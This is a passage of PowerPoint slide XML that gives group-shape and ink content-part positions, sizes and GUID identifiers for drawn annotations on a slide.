                <a:ext cx="110160" cy="1119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A4E582A-7EF3-CA45-BB56-98AF61FC8F9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829313" y="2894152"/>
                  <a:ext cx="127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031BEF3-410A-4945-A7F4-070890700682}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8017953" y="2895232"/>
                <a:ext cx="108000" cy="709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031BEF3-410A-4945-A7F4-07089070068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009313" y="2886592"/>
                  <a:ext cx="1256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FD6DAB0-6DA1-294D-905B-770C2C4E0183}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8145393" y="2736832"/>
                <a:ext cx="27360" cy="1954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FD6DAB0-6DA1-294D-905B-770C2C4E018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136393" y="2728192"/>
                  <a:ext cx="450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123A457-BC12-2844-88A1-4613E8AE9F7E}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8156553" y="2885152"/>
                <a:ext cx="136440" cy="1080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123A457-BC12-2844-88A1-4613E8AE9F7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147913" y="2876512"/>
                  <a:ext cx="1540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7919844-ABFD-7842-AB6E-F9312268A11D}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6494433" y="3520192"/>
                <a:ext cx="254880" cy="554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7919844-ABFD-7842-AB6E-F9312268A11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485433" y="3511192"/>
                  <a:ext cx="272520" cy="57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9AA5C2C-3ED6-D84D-AB41-B9C29337E0D5}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7024353" y="3122752"/>
                <a:ext cx="537840" cy="7628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9AA5C2C-3ED6-D84D-AB41-B9C29337E0D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015713" y="3113752"/>
                  <a:ext cx="555480" cy="78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8883410-BB63-8547-96C7-913FE7C8ADDF}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6983673" y="3826552"/>
                <a:ext cx="136080" cy="1947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8883410-BB63-8547-96C7-913FE7C8ADD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974673" y="3817552"/>
                  <a:ext cx="1537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BA4D47E-A028-E447-B377-8BB56743DC59}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7562913" y="3593272"/>
                <a:ext cx="110520" cy="5824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BA4D47E-A028-E447-B377-8BB56743DC5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554273" y="3584632"/>
                  <a:ext cx="12816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683F720-993E-3040-8611-308292953531}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7906353" y="3531352"/>
                <a:ext cx="105120" cy="6282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683F720-993E-3040-8611-30829295353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897713" y="3522712"/>
                  <a:ext cx="122760" cy="64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7881024-8FBF-124C-9698-EFF80E5A926D}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6896913" y="3851032"/>
                <a:ext cx="301680" cy="2394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7881024-8FBF-124C-9698-EFF80E5A926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887913" y="3842392"/>
                  <a:ext cx="319320" cy="25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E44AC83-5F83-BA4D-BBD3-AB72154372CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8149713" y="3687952"/>
            <a:ext cx="675720" cy="384120"/>
            <a:chOff x="8149713" y="3687952"/>
            <a:chExt cx="675720" cy="38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EF6E1D3-5022-1E4E-9BFF-D026BAB3386A}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8149713" y="3760312"/>
                <a:ext cx="187920" cy="126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EF6E1D3-5022-1E4E-9BFF-D026BAB3386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141073" y="3751312"/>
                  <a:ext cx="2055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4F4489B-5D04-C644-A6A9-DFE71C761D13}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8161953" y="3878752"/>
                <a:ext cx="160920" cy="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4F4489B-5D04-C644-A6A9-DFE71C761D1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152953" y="3869752"/>
                  <a:ext cx="178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E55273D-BAE1-BE4B-9273-5CD216E263BA}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8519433" y="3687952"/>
                <a:ext cx="306000" cy="3841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E55273D-BAE1-BE4B-9273-5CD216E263B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510793" y="3679312"/>
                  <a:ext cx="323640" cy="40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DA6F21D-82C9-8C41-B1E8-E1019DC0B61E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3013233" y="1557472"/>
            <a:ext cx="1208880" cy="415440"/>
            <a:chOff x="3013233" y="1557472"/>
            <a:chExt cx="1208880" cy="41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CFAFC1B-1756-2548-8857-73D51F8CA3B3}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3013233" y="1607872"/>
                <a:ext cx="452520" cy="3650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CFAFC1B-1756-2548-8857-73D51F8CA3B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04233" y="1599232"/>
                  <a:ext cx="47016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1428338-0011-4743-B927-EACC45370C22}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3566913" y="1621912"/>
                <a:ext cx="655200" cy="18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1428338-0011-4743-B927-EACC45370C2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558273" y="1612912"/>
                  <a:ext cx="6728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83E0CEE-90A3-1140-9340-8900AD141B7D}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3518673" y="1557472"/>
                <a:ext cx="157680" cy="1684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83E0CEE-90A3-1140-9340-8900AD141B7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509673" y="1548472"/>
                  <a:ext cx="175320" cy="1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ACD7256-20E5-A44A-B672-2C9581A8A8F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2138433" y="1550992"/>
            <a:ext cx="677880" cy="240480"/>
            <a:chOff x="2138433" y="1550992"/>
            <a:chExt cx="677880" cy="24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F09AFF2-7427-A847-8085-DDD12F22B57B}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2217993" y="1644592"/>
                <a:ext cx="598320" cy="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F09AFF2-7427-A847-8085-DDD12F22B57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208993" y="1635592"/>
                  <a:ext cx="615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BFA3FCB-F0AB-EC49-8870-3F4BC58F4614}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2138433" y="1550992"/>
                <a:ext cx="195480" cy="2404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BFA3FCB-F0AB-EC49-8870-3F4BC58F461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129433" y="1541992"/>
                  <a:ext cx="213120" cy="25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F10DF89-6074-E443-8BFA-581E9C2A9DC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="857553" y="3746632"/>
            <a:ext cx="1456920" cy="1512720"/>
            <a:chOff x="857553" y="3746632"/>
            <a:chExt cx="1456920" cy="151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CFCF785-F55B-A945-9C48-8D2C15723D9F}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1026753" y="4703512"/>
                <a:ext cx="360" cy="4183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CFCF785-F55B-A945-9C48-8D2C15723D9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17753" y="4694872"/>
                  <a:ext cx="1800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D077472-E20E-6E4B-B18F-84E1F70784AD}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="857553" y="4691272"/>
                <a:ext cx="447480" cy="4737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D077472-E20E-6E4B-B18F-84E1F70784A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48553" y="4682272"/>
                  <a:ext cx="46512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5B7AF3D-22BF-5B44-B2D3-D8AA8975C4E4}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1248513" y="3746632"/>
                <a:ext cx="205920" cy="11282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5B7AF3D-22BF-5B44-B2D3-D8AA8975C4E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239513" y="3737632"/>
                  <a:ext cx="223560" cy="11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2562B8D-3FF0-CD49-9DA0-DC8892084844}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1367673" y="4751392"/>
                <a:ext cx="104400" cy="1850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2562B8D-3FF0-CD49-9DA0-DC889208484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358673" y="4742392"/>
                  <a:ext cx="1220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8329B5A-04F3-DF4A-AC83-AD4BCC6DB021}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1662153" y="4532872"/>
                <a:ext cx="112680" cy="6609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8329B5A-04F3-DF4A-AC83-AD4BCC6DB02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653513" y="4524232"/>
                  <a:ext cx="130320" cy="67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8CA5733-14C5-CC4B-9E7D-855272928B72}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1819473" y="4755352"/>
                <a:ext cx="262080" cy="3808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8CA5733-14C5-CC4B-9E7D-855272928B7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810833" y="4746352"/>
                  <a:ext cx="27972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5579650-2A93-624F-AC84-0CE698395DEC}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2085873" y="4628992"/>
                <a:ext cx="228600" cy="6303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5579650-2A93-624F-AC84-0CE698395DE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077233" y="4619992"/>
                  <a:ext cx="246240" cy="64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0D22586-F32C-B24C-9EBF-4AFBA14236AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2499513" y="4767952"/>
            <a:ext cx="651240" cy="378000"/>
            <a:chOff x="2499513" y="4767952"/>
            <a:chExt cx="651240" cy="37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DB43F0C-A581-0944-AD6D-8B33A36DA46F}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2499513" y="4933552"/>
                <a:ext cx="153000" cy="3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DB43F0C-A581-0944-AD6D-8B33A36DA46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490513" y="4924912"/>
                  <a:ext cx="170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14E6DDE-F52F-1243-BA65-D23BC200DCA6}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2499873" y="5050552"/>
                <a:ext cx="141120" cy="3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14E6DDE-F52F-1243-BA65-D23BC200DCA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490873" y="5041912"/>
                  <a:ext cx="158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945C36F-0026-6644-8764-8106D8C74B21}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2822793" y="4767952"/>
                <a:ext cx="327960" cy="3780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945C36F-0026-6644-8764-8106D8C74B2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813793" y="4759312"/>
                  <a:ext cx="345600" cy="39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9E393627-4E6D-AB43-A2FF-A501BE315EFE}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="8494593" y="4213192"/>
              <a:ext cx="447480" cy="860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9E393627-4E6D-AB43-A2FF-A501BE315EFE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485593" y="4204192"/>
                <a:ext cx="46512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0DEC0627-080A-1347-88BE-6F5FA978C873}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="-171687" y="3701272"/>
              <a:ext cx="360" cy="3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0DEC0627-080A-1347-88BE-6F5FA978C87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-180327" y="369227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4261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93E3E-6F95-F246-B6A0-AA45ACDAE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AE4CC50-432C-A049-BF59-7CB8099204D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="536073" y="1658632"/>
            <a:ext cx="8125200" cy="651960"/>
            <a:chOff x="536073" y="1658632"/>
            <a:chExt cx="8125200" cy="65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8753AD9-9E31-9D48-9267-C27D31489F30}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="536073" y="1658632"/>
                <a:ext cx="333720" cy="651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8753AD9-9E31-9D48-9267-C27D31489F3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27073" y="1649632"/>
                  <a:ext cx="351360" cy="6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1498A7C-04F1-2046-AF7D-83C0101DCF75}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="626073" y="2103592"/>
                <a:ext cx="23292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1498A7C-04F1-2046-AF7D-83C0101DCF7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7073" y="2094952"/>
                  <a:ext cx="250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6C71B3B-2FA1-C44B-A2BC-4C006E77F6CC}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8361753" y="1812352"/>
                <a:ext cx="27000" cy="379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6C71B3B-2FA1-C44B-A2BC-4C006E77F6C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352753" y="1803352"/>
                  <a:ext cx="4464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AEE8E9C-3027-124A-A43F-27D1C920747A}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8332953" y="1742872"/>
                <a:ext cx="328320" cy="490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AEE8E9C-3027-124A-A43F-27D1C920747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324313" y="1734232"/>
                  <a:ext cx="34596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6FEE636-D7CB-2F46-AD4A-A1E978D11599}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1659633" y="2020072"/>
                <a:ext cx="6113520" cy="120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6FEE636-D7CB-2F46-AD4A-A1E978D1159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50633" y="2011072"/>
                  <a:ext cx="6131160" cy="13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7A50919-1C7F-344F-8AF4-17FEB5480C49}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="6438993" y="3400672"/>
              <a:ext cx="424080" cy="6224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7A50919-1C7F-344F-8AF4-17FEB5480C4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30353" y="3391672"/>
                <a:ext cx="441720" cy="64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2EBDF4CC-A466-1340-A873-13A4F83849C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6796833" y="2507152"/>
            <a:ext cx="1983600" cy="1517760"/>
            <a:chOff x="6796833" y="2507152"/>
            <a:chExt cx="1983600" cy="151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103954F-9C15-CC4C-A24B-90D5B2882448}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8079153" y="2507152"/>
                <a:ext cx="172080" cy="385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103954F-9C15-CC4C-A24B-90D5B288244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70513" y="2498152"/>
                  <a:ext cx="18972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4E3A555-9DBB-DB47-BDE7-0DCA35CCC623}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8044953" y="2768152"/>
                <a:ext cx="106200" cy="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4E3A555-9DBB-DB47-BDE7-0DCA35CCC62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36313" y="2759512"/>
                  <a:ext cx="123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2F3D90E-8F99-ED42-A5D5-A3C246941107}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8343033" y="2794072"/>
                <a:ext cx="4320" cy="128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2F3D90E-8F99-ED42-A5D5-A3C24694110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34033" y="2785072"/>
                  <a:ext cx="219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1852860-9D76-9644-AA34-56A8A1666545}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8334393" y="2773192"/>
                <a:ext cx="86040" cy="964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1852860-9D76-9644-AA34-56A8A166654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325393" y="2764192"/>
                  <a:ext cx="1036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221D7AB-D600-D847-A7E4-617CBCDC949D}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8469033" y="2751232"/>
                <a:ext cx="123480" cy="127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221D7AB-D600-D847-A7E4-617CBCDC949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460033" y="2742232"/>
                  <a:ext cx="1411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57FC153-96D5-4B49-9EBC-740073226136}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8623113" y="2601112"/>
                <a:ext cx="23760" cy="251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57FC153-96D5-4B49-9EBC-74007322613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614113" y="2592472"/>
                  <a:ext cx="414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0F5E34C-8A27-6649-AB63-1EA3B717AE2A}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8631033" y="2735392"/>
                <a:ext cx="149400" cy="142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0F5E34C-8A27-6649-AB63-1EA3B717AE2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622033" y="2726392"/>
                  <a:ext cx="1670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EE771AD-9C0E-B54A-A3C0-CE1E8A2F1143}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7413873" y="3421912"/>
                <a:ext cx="27000" cy="406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EE771AD-9C0E-B54A-A3C0-CE1E8A2F114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404873" y="3412912"/>
                  <a:ext cx="4464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FBB31B1-3C3E-BC49-9D7F-8FD53D09B282}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7450233" y="3525232"/>
                <a:ext cx="225720" cy="273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FBB31B1-3C3E-BC49-9D7F-8FD53D09B28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41593" y="3516232"/>
                  <a:ext cx="2433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779F0F8-4AB8-0B4E-BD4F-DD059BD11D2C}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7265193" y="3360712"/>
                <a:ext cx="110880" cy="547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779F0F8-4AB8-0B4E-BD4F-DD059BD11D2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56553" y="3351712"/>
                  <a:ext cx="12852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2B89326-B01A-2949-8E14-18458248EEFB}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7686753" y="3358912"/>
                <a:ext cx="181800" cy="6660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2B89326-B01A-2949-8E14-18458248EEF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78113" y="3349912"/>
                  <a:ext cx="199440" cy="6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A5BE950-00E6-F844-8F14-D28B60A05003}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7461033" y="3931672"/>
                <a:ext cx="253800" cy="291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A5BE950-00E6-F844-8F14-D28B60A0500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52033" y="3922672"/>
                  <a:ext cx="2714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355A124-C1B0-7842-9702-DEECFFBEB12F}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6859113" y="2729632"/>
                <a:ext cx="1088640" cy="1026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355A124-C1B0-7842-9702-DEECFFBEB12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50473" y="2720992"/>
                  <a:ext cx="1106280" cy="10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B122D70-FF7C-E345-9866-66873214CF47}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6796833" y="3665632"/>
                <a:ext cx="214560" cy="155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B122D70-FF7C-E345-9866-66873214CF4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787833" y="3656992"/>
                  <a:ext cx="2322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2D83959-6DCC-4344-9A7A-02411237D0D8}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8016873" y="3697672"/>
                <a:ext cx="117720" cy="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2D83959-6DCC-4344-9A7A-02411237D0D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008233" y="3689032"/>
                  <a:ext cx="135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5DC0BE0-13E8-3C43-91E3-2BAF4E82F4EC}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8028753" y="3790552"/>
                <a:ext cx="138960" cy="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5DC0BE0-13E8-3C43-91E3-2BAF4E82F4E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019753" y="3781912"/>
                  <a:ext cx="156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4FB995D-0036-D947-8F2A-54719459E7FD}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8306313" y="3596512"/>
                <a:ext cx="356760" cy="397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4FB995D-0036-D947-8F2A-54719459E7F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297313" y="3587512"/>
                  <a:ext cx="37440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4324AA1-DE32-5243-AA52-B04E4511496C}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7490913" y="3943192"/>
                <a:ext cx="21924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4324AA1-DE32-5243-AA52-B04E4511496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82273" y="3934552"/>
                  <a:ext cx="23688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2E8FE1E-588D-4249-A090-F4B85DBCE960}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4556913" y="1679872"/>
            <a:ext cx="1166040" cy="232200"/>
            <a:chOff x="4556913" y="1679872"/>
            <a:chExt cx="1166040" cy="23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41BA7BA-F8A7-3242-A306-2B8A23CF4BDA}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4646913" y="1696432"/>
                <a:ext cx="1076040" cy="1008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41BA7BA-F8A7-3242-A306-2B8A23CF4BD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38273" y="1687432"/>
                  <a:ext cx="10936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B2E3066-BF6A-854E-B72A-3A2E9567791D}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4556913" y="1679872"/>
                <a:ext cx="244080" cy="2322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B2E3066-BF6A-854E-B72A-3A2E9567791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48273" y="1671232"/>
                  <a:ext cx="261720" cy="24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AA1F06E-1A91-E744-B9F2-550EAE5DE11B}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5829153" y="1721992"/>
              <a:ext cx="294480" cy="2448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AA1F06E-1A91-E744-B9F2-550EAE5DE11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820153" y="1712992"/>
                <a:ext cx="312120" cy="26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17BE4F37-8147-8F45-8FAE-2761E48B8559}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="71313" y="2920792"/>
            <a:ext cx="1352160" cy="823320"/>
            <a:chOff x="71313" y="2920792"/>
            <a:chExt cx="1352160" cy="82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BEAFD6E-16BE-AE40-9AC6-B3708C8E658D}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="791313" y="3076312"/>
                <a:ext cx="427680" cy="4348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BEAFD6E-16BE-AE40-9AC6-B3708C8E658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82313" y="3067672"/>
                  <a:ext cx="44532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F03F00C-EC3C-DF41-9703-93039FAAC454}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="703113" y="2965792"/>
                <a:ext cx="79920" cy="702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F03F00C-EC3C-DF41-9703-93039FAAC45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94113" y="2957152"/>
                  <a:ext cx="97560" cy="71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6181D00-3FE4-3D45-9F09-03C733BD201F}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1311513" y="2920792"/>
                <a:ext cx="111960" cy="8233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6181D00-3FE4-3D45-9F09-03C733BD201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302873" y="2912152"/>
                  <a:ext cx="129600" cy="84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4F26EEE-9723-7A44-BEEC-662BA1E21218}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="71313" y="3205192"/>
                <a:ext cx="123120" cy="358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4F26EEE-9723-7A44-BEEC-662BA1E2121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2673" y="3196192"/>
                  <a:ext cx="14076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452C342-66B9-E040-AE1A-68FA977C1F13}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="83913" y="3460792"/>
                <a:ext cx="96840" cy="165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452C342-66B9-E040-AE1A-68FA977C1F1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4913" y="3452152"/>
                  <a:ext cx="1144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61A17F0-84D8-0842-9DE0-9AF8CA9B17CD}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="274353" y="3529552"/>
                <a:ext cx="360" cy="1875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61A17F0-84D8-0842-9DE0-9AF8CA9B17C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65713" y="3520552"/>
                  <a:ext cx="180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D9CDB6E-B456-5347-9884-4D660792AEB5}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="254913" y="3547552"/>
                <a:ext cx="54360" cy="1044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D9CDB6E-B456-5347-9884-4D660792AEB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6273" y="3538552"/>
                  <a:ext cx="720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85D2721-1601-2A49-ADFF-3ED29751A376}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
